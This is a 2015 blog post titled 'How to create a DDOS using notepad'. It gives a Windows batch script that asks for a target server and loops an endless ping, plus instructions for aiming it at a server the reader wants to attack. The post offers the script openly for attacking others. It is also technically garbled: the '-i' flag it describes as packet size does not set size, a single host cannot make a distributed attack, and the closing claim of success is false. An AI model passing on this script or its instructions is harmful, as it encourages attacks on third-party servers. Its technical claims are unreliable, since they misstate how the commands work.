BCA

How to create a DDOS using notepad

Monday, September 14, 2015

How to create a DDOS using notepad


Step 1: Create a text document with notepad.
Step 2: Copy and paste this script into that new text document.
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
@echo off
mode 67,16
title DDOS Attack (Umair Khan)
color 0a
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo Created By Umair Khan DDOS
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Server-Target:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=IP Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 
Step 3: Save the file as DDOS.bat
You have now Created the File
 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
How to use the DDOS
 
When it says Server-Target type the web address of the server that you would like to DDOS
Then you should realise that it will come up Pinging (your web address here)
Now you should notice that the server of the person you would like to DDOS has appeared
Next it should come up IP Host : here is where you type the servers IP
Now it should pop up Packets : here you have to type 5000,000
Now it should keep repeating Attacking server in red now you have successfully DDOS the server

0 comments:

Post a Comment